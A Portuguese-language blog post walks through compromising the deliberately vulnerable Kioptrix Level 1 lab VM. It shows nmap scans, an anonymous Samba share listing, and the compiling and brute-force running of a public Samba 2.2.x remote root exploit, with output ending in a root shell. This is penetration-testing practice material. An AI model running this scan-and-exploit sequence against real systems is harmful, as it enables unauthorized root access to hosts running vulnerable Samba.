quinta-feira, 28 de novembro de 2013

Pentest com KIOPTRIX

Eae feras, depois de uma semana praticamente sem postar nada, parado olhando a tela do BackTrack, resolvi postar algo sobre Pentest e depois uma outra postagem meio random que não será 'tanta' novidade assim, mas beleza é o que tem pra 'today' :)
Começando logo com o nosso hobbie, nesta exploração estarei usando o BackVM Kioptrix Level 1(cara, isso é old!! - fodaci), onde estaremos então fazendo um escalo de privilegio e obtendo o acesso root.

Aproveita enquanto faz o download, deixando o seu Sistema Linux buscar diretamente o IP por DHCP, então assim é só subir a ISO.
Beleza, agora vamos descobrir que IP está sendo usado usando a mais bela ferramenta em LUA script, o NMAP e depois descobrir a versão que está rodando.

# nmap -T4 -P0 -v -n -f -p- 192.168.0.0/24

resultado:

Nmap scan report for 192.168.0.104
Host is up (0.00084s latency).
Not shown: 65528 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
443/tcp   open  https
1024/tcp  open  kdm
45295/tcp open  unknown

segundo comando
# nmap -sTUV -n -pT :22,80,11,139,443,32768,U:111,137,32768 192.168.0.104

Starting Nmap 6.00 ( http://nmap.org ) at 2013-11-27 03:51 BRT
Nmap scan report for 192.168.0.104
Host is up (0.0038s latency).
PORT      STATE  SERVICE              VERSION
11/tcp    closed systat
22/tcp    open   ssh                  OpenSSH 2.9p2 (protocol 1.99)
80/tcp    open   http                 Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
139/tcp   open   netbios-ssn          Samba smbd (workgroup: MYGROUP)
443/tcp   open   ssl/http             Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
32768/tcp closed filenet-tms
111/udp   open   rpcbind (rpcbind V2) 2 (rpc #100000)
137/udp   open   netbios-ns           Microsoft Windows XP netbios-ssn
32768/udp closed omad
MAC Address: 20:17:4C:32:00:00 (Wistron Neweb)
Service Info: Host: KIOPTRIX; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.30 seconds

Então quer dizer que detectou um banner do SMBD como anonymous? kkkkkkkkkkkkk
beleza então né :) só nos basta o que? isso, fechar tudo e sair fora #sóquenão vamos fazer o login nessa desgraça.

# smbdclient -L 192.168.0.104 -N

Anonymous login successful
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]

    Sharename       Type      Comment
    ---------                 ----         -------
cli_rpc_pipe_open_noauth: rpc_pipe_bind for pipe \srvsvc failed with error ERRnosupport

    IPC$           IPC       IPC Service (Samba Server)
    ADMIN$     Disk      IPC Service (Samba Server)

Anonymous login successful
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]

    Server               Comment
    ---------                     -------
    KIOPTRIX             Samba Server

    Workgroup           Master
    ---------                     -------
    MYGROUP              KIOPTRIX
    WORKGROUP        SLAYER-PC

Depois disso preciso mesmo dizer que o sistema é um Unix rodando com um paulinho da viola Samba na versão 2.2.1a? acho que não, então não irei dizer >:( hunf!

Se você está no meio de um serviço e precisa de uma ferramenta que pode ser encontrada do seu lado, porém elas não são suas, você pega emprestado ou viaja pra comprar uma? OK, então vamos pegar emprestado, conselho pegar na mala onde a marca é EXPLOIT-DB.

Tem um exploit de busca do exploit-db muito bom, que podemos usa-lo, mas vamos supor que não tenha, passeando pelo exploit-db.com, logo encontrei algo que vai nos interessar:
http://www.exploit-db.com/exploits/10/ esse exploit que irei chamar de 10.c é a ferramenta que iremos usar para foder a porra toda. Mas primeiro, lógico, vamos compilar... pra isso use algum IDE ou o gcc do linux.

# gcc 10.c -o smbd
(Sim, ele dará um erro na compilação, que será bem grotesco kkkkkkkk na certa é bem proposital para que os scripts kiddies tenham dificuldades... ué ele achou um script completo mano, o único trabalho dele é encontrar o bug e arrumar, eu não irei dizer... se o cara que fez o script não disse quem sou eu pra ficar falando, não é mesmo? então dê uma estudada aí no código e descubra o bug /Boa Sorte!)

Você conseguiu achar o erro? *Palmas*
vamos então executar-lo de um modo onde ele fará um brute-force (-b) e nos dará de presente um acesso root.

# ./smbd -b 0 -v 192.168.0.104
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Verbose mode.
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Using ret: [0xbffffed4]
+ Using ret: [0xbffffda8]
+ Using ret: [0xbffffc7c]
+ Using ret: [0xbffffb50]
+ Using ret: [0xbffffa24]
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)

hhmmmmmmmm.... temos o privilegio root, olha só que emoção <3
Bem o objetivo do artigo foi completado, se quiser se divertir aí beleza e se chegou até aqui.. até que não foi tão mal né, olhe só.. nisso você aprendeu mais do que conseguir o root, conseguiu descobrir o bug no código.

Beleza, estou indo nessa, bye!

Nenhum comentário:

Postar um comentário